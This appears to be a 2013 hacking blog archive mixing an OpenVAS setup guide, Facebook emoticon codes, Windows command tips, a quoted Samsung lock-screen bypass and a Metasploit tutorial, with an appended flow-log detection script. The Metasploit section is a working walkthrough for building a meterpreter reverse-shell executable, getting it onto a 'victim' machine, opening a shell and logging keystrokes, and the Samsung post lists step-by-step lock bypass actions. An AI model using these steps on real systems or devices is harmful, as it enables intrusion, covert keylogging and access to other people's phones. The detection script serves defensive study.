Friday, 6 September 2013

OpenVAS web vulnerability scanner

Hello friends,
Today we are going to discuss how to install and use OpenVAS, which is an open source web vulnerability scanner.
We will be doing this on Kali Linux.
I assume you have already installed the Kali Linux distribution.
If not, install it first. If you don't know how to install Kali Linux, this tutorial might not be for you; still, you can learn how to install Kali Linux here.
To install OpenVAS, go to:
Applications > Kali Linux > Vulnerability Analysis > OpenVAS > openvas-setup
It will download some things, such as the latest vulnerability database, and then initialize the things it requires to work.
Next it will start some plugins.
You might have heard about the GUI version of it, but I am not going to use it, as it is not as good as what we are going to use, which is the web version of the tool.
The default username is admin.
It will take some time to start, so don't panic.
After a while it will ask you to enter a password.
Remember to enter a strong password, as this account will be a super user, like root is in Linux.
Now open your browser and go to the URL https://127.0.0.1:9392
It will show an error saying that it is an untrusted connection.
Just click on "I Understand the Risks": the certificate is self-signed, so the error is genuine, and you are connecting to your own machine at 127.0.0.1.
Then add an exception in your browser.
Now a login page will appear.
Enter admin as the username, and the password you entered at the command prompt.
Now go to Administration > NVT Feed and click on Synchronize with Feed. It will update the vulnerability database of your application.

Do the same with the SCAP and CERT feeds too.
If you want to add users, click on Administration > Users.
Enter a name, password and role, and click on Create User.
You can now see the user in the list of users.
Now go to Extras and click on Target, which is the first step in attacking.
Name the target and set the IP address, or select a file with a list of IP addresses.
Keep the port list untouched and click on Create Target.
Now go to Scan Management and click on New Task.
Again, enter the name of the scan and select the scan target.
The lower the option you select, the more time the scan will take, as it becomes more detailed.
You can also schedule the scan, and you can also add an observer.
Now click on Create Task.
You can now see the scan in your tasks.
In Actions, click on Start.
Choose the 10 sec auto refresh and click on Refresh.
When the bar reaches 100 percent, click on the date in the last section, and you will get the report.
Select the full report and you can download it as HTML.
The PDF is not working, so you have only one option, which is better than the others: HTML.
So use it, as you can also edit it the way you want.

Now edit it the way you want and give it to your client.
This post was written by ManishBeingNegative. He is a Security Researcher and Penetration Tester. He is also the owner of XgenSecurity.

Thursday, 6 June 2013

IMPORTANT MESSAGE TO ALL VISITORS

THIS BLOG HAS MOVED TO

ANONYMOUSLEADER.BLOGSPOT.COM

THANKS, KEEP VISITING AND SHARE IT!

Thursday, 30 May 2013

Facebook smilies

  • [[171108522930776]] Troll Face 
  • [[164413893600463]] MEGUSTA 
  • [[218595638164996]] YAO 
  • [[189637151067601]] Lol 
  • [[129627277060203]] Poker face. 
  • [[227644903931785]] Forever ALONE. 
  • [[100002752520227]] OKAY 
  • [[105387672833401]] F**K YEA. 
  • [[100002727365206]] CH AC. 
  • [[125038607580286]] Forever alone navidad. 
  • [[143220739082110]] FK KIDDING ME. 
  • [[168040846586189]] Feel like a Sir. 
  • [[169919399735055]] NOT BAD 
  • [[142670085793927]] M O G. 
  • [[170815706323196]] Cereal Guy 
  • [[167359756658519]] NO 
  • [[224812970902314]] Derp 
  • [[192644604154319]] Derpina

Convert a text into mp3


Hi friends,

Today I'm sharing a website with you. It's especially for those of you who want to convert text into .mp3.
Just copy and paste your text, or type it into the given space, and you can download it as an mp3.
No matter how long the text is, it will convert it. You can also choose between a male and a female voice, and there are multiple language options. So here is the link,

  http://www.vozme.com

Hope you guys like it :))

Thanks,

Command Prompt Tricks+Hacks Premier





Hey guys how you been ? Hope you rockin it ;-)
It's been requested that I make a post on Command Prompt commands, usage and other tricks, so I'll cover this in parts.
Anyway, if you want to know how to get an IP, I have already posted on that; here is the link



Basic commands


  • dir : lists all the files and directories in the current location
  • cd : changes to the specified path, e.g. if you are at c:\> and you type cd users\public, it will take you to c:\Users\Public>
  • cd.. : takes you one directory back
  • systeminfo : gives you system information such as processor, speed, hotfixes, RAM, hard disk etc.
  • md : makes a folder with the name you specify, e.g. md hello
  • color : sets the color of the command prompt and its text
  • echo : displays a message
  • echo message >> name.txt : saves the message you have written to a file, in this case name.txt

SHUTDOWN

You can use the shutdown command with various parameters, e.g. shutdown /s

  • /l : logs you off
  • /s : shuts down the computer
  • /r : restarts the computer
  • /a : aborts the shutdown. Suppose you have used shutdown /s: it will shut down the computer in less than a minute, and if you use shutdown /a within that minute, the shutdown process will be aborted
  • /p : turns off the computer without any delay
  • /h : hibernates the computer
  • /s /c message : this combination shuts down the computer with a message which you have to specify
  • /m : used to shut down a remote computer, but for that you have to know the login ID and password of the remote computer :-)

SPECIAL COMMANDS

THERE ARE TWO COMMANDS WHICH ARE HELPFUL IN EVERY SITUATION
  • HELP : THIS DISPLAYS ALL THE COMMANDS YOU CAN USE
  • command /? : this is used to get information about the specified command. Suppose you want to know about md: type md /? and it will display the information about that command.
These are very basic commands, so remember them. In the next post I'll start batch file programming. Batch files are really interesting :-)


Hope you enjoyed this .. thanks for reading :)
Stay Tuned !!!
(comment and like plz )

How To Send Friend Requests On Facebook When You Are Blocked

With help of this trick you can send 1000′s of friend requests even if you are blocked. 
So without wasting time let’s start how this trick works?



If you are going to add an unknown person, you need the email address of the person you want to add. After you get the email address of the person to whom you want to send a friend request, either from his profile or some other way, follow these steps.


1) Go HERE


Here you will find a place to add friends through their emails, based on the different mail services. But if you're thinking of adding too many people, it would be better to create a contact file.

If you don’t know the easiest way to make contact file then follow these steps.
a) Open new text document (.txt) in notepad.
b) Add all the email addresses separated by a comma ( , ).
c) Now save that file with the extension .vcf
Now this is your contact file.

2) Upload this file to Facebook and you will be prompted to send friend requests.


NOTE : If you don’t know how to upload contact file then follow this step.

Go HERE

In that the last option is of ‘other tools’ in which you will find the next option to upload the file!


3) Click “OK” and you’re done.


Simple yet effective! Your friend request would be sent to desired people.


Tuesday, 30 April 2013

hack samsung password

How to Hack Samsung Phone Screen Lock


I have discovered another security flaw in Samsung Android phones. It is possible to completely disable the lock screen and get access to any app - even when the phone is "securely" locked with a pattern, PIN, password, or face detection. Unlike another recently released flaw, this doesn't rely quite so heavily on ultra-precise timing.

Of course, if you are unable to download a screen unlocker, this security vulnerability still allows you to dial any phone number and run any app!

HOWTO

  1. From the lock screen, hit the emergency call button.
  2. Dial a non-existent emergency services number - e.g. 0.
  3. Press the green dial icon.
  4. Dismiss the error message.
  5. Press the phone's back button.
  6. The app's screen will be briefly displayed.
  7. This is just about long enough to interact with the app.
  8. Using this, you can run and interact with any app / widget / settings menu.
  9. You can also use this to launch the dialler.
  10. From there, you can dial any phone number (one digit at a time) and place a phone call.
  11. With Google Play, you can search for apps using the voice interface.
  12. You can download apps from the app store which will disable the screen lock.

Impact

This does not occur on stock Android from Google. This flaw only seems to be present on Samsung's version of Android. I have only tested it on a Galaxy Note II running 4.1.2 - I believe it should work on Samsung Galaxy SIII. It may work on other devices from Samsung.
My test phone was running 4.1.2 with the Touchwiz launcher from Samsung.

Defending Against This Attack

Until Samsung release a patch, the only way this can be defended against is by completely removing the Samsung firmware and replacing it with a 3rd party ROM.
This ROM for the Galaxy S III claims to have fixed the problem.
I'm sure there will be ROMs for other Galaxy devices in due course.

Responsible Disclosure

I reported this flaw to Samsung in late February. They are working on a patch which they assure me will be released shortly.
I have delayed public disclosure of this vulnerability. I also asked if they wanted me to delay publication until a patch was ready - however they declined this offer.
If you discover a security issue with Samsung's mobile products, I strongly encourage you to email m.security AT samsung.com
They will provide their PGP public key if you wish to ensure your communications with them are secure.

Thanks

My thanks to Thang Chien of Vietnam, who first demonstrated a variant of this flaw in January.
Thanks also to David Rogers, Marc Rogers, Alec Muffett, and Glyn Wintle for their wisdom and advice around the subject of responsible disclosure. Any faults with this disclosure are mine and mine alone.

HACK WEBSITE USING BACKTRACK IN EASY WAY



--- The Metasploit Framework ---



Note: This is an advanced topic. Read carefully. Feel free to ask any kind of queries. We are always here to help you.

If you are really interested in network security, chances are you have heard of Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wN you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise from even a simple reason like not updating your Flash player last week when it prompted you to do so.
Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic of Metasploit is very vast in itself. However, I'll try keeping it basic and simple so that it can be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack).
In this tutorial, I'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.


Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.


Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them).


Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: An error caused when a program tries to store data beyond its size. It may be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.
Now, what is Metasploit?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.





METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer a little difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because it is effective and powerful from a pentester’s P0V. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.
I would recommend doing the following things in Metasploit on Backtrack (system or image), avoiding the Windows version of the tool.
For those who don't know, Backtrack is a Linux distro made especially for security personnel, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or the VMware image, according to the one you're comfortable with. If you have physical access to more than one system, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~# /etc/init.d/wicd start
to start the wicd manager.
Finally, type "startx" to start the GUI mode:
root@bt:~# startx

First of all, find your local IP by opening up a konsole (on the bottom left of the taskbar) and typing in:
root@bt:~# ifconfig
It will be something like 192.168.x.x or 10.x.x.x.
Make a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now have a shell similar to a command prompt in Windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)


root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload handler is listening for all incoming connections on port 4444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps

Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the keylogger activity on the victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
just type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You will now have a command prompt.
Type in whoami to see the victim's computer name and user name:
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed something on his computer.
Just type exit to return to meterpreter.
Now type in keyscan_dump to see all the typed keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is for educational purposes only. You should test it only against a computer you own.
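
Seen from the defender's side, the session opened above leaves a recognisable trace in flow logs: the client connects out to port 4444, sends almost nothing, and receives a 749056-byte stage. The script below is an added example, not part of the original post; the CSV column layout, the sample rows, the common-port list and the scoring thresholds are assumptions made for illustration.

```python
import csv
import io
import ipaddress

# Constructed sample flow records (not from the original post). Columns follow a
# simplified connection-log layout: originator, responder, bytes sent by each side.
SAMPLE_FLOWS = """ts,orig_h,orig_p,resp_h,resp_p,proto,orig_bytes,resp_bytes
1300030332.0,192.168.255.1,62853,192.168.255.130,4444,tcp,412,749890
1300030340.5,192.168.255.1,62901,192.168.255.20,443,tcp,1840,52110
1300030351.2,192.168.255.7,50112,192.168.255.130,8080,tcp,95,751200
1300030360.9,192.168.255.9,50333,192.168.255.40,445,tcp,88000,91000
"""

STAGE_BYTES = 749056   # stage size printed by the handler in the post
WATCH_PORTS = {4444}   # LPORT used in the post
COMMON_PORTS = {25, 53, 80, 443, 445, 993, 3389}  # assumption: tune per network


def score_flow(row):
    """Return (score, reasons) for one flow; higher means more handler-like."""
    score, reasons = 0, []
    resp_p = int(row["resp_p"])
    sent, recv = int(row["orig_bytes"]), int(row["resp_bytes"])
    if resp_p in WATCH_PORTS:
        score += 2
        reasons.append(f"responder port {resp_p} is on the watch list")
    # A staged payload shows up as the client sending almost nothing and then
    # receiving one large blob. Allow 10% slack because stage sizes vary.
    if recv >= STAGE_BYTES * 0.9 and sent * 100 < recv:
        score += 2
        reasons.append(f"received {recv} bytes after sending only {sent}")
    if resp_p not in COMMON_PORTS and ipaddress.ip_address(row["orig_h"]).is_private:
        score += 1
        reasons.append("internal client talking to an uncommon port")
    return score, reasons


def find_suspect_flows(log_text, threshold=3):
    """Parse the CSV flow log and return flagged flows, highest score first."""
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["proto"] != "tcp":
            continue
        score, reasons = score_flow(row)
        if score >= threshold:
            hits.append({"client": row["orig_h"],
                         "server": f'{row["resp_h"]}:{row["resp_p"]}',
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])


if __name__ == "__main__":
    for hit in find_suspect_flows(SAMPLE_FLOWS):
        print(hit["score"], hit["client"], "->", hit["server"], "; ".join(hit["reasons"]))
```

The third sample row is flagged on the size and direction of the transfer alone, so the check does not depend on the listener staying on port 4444.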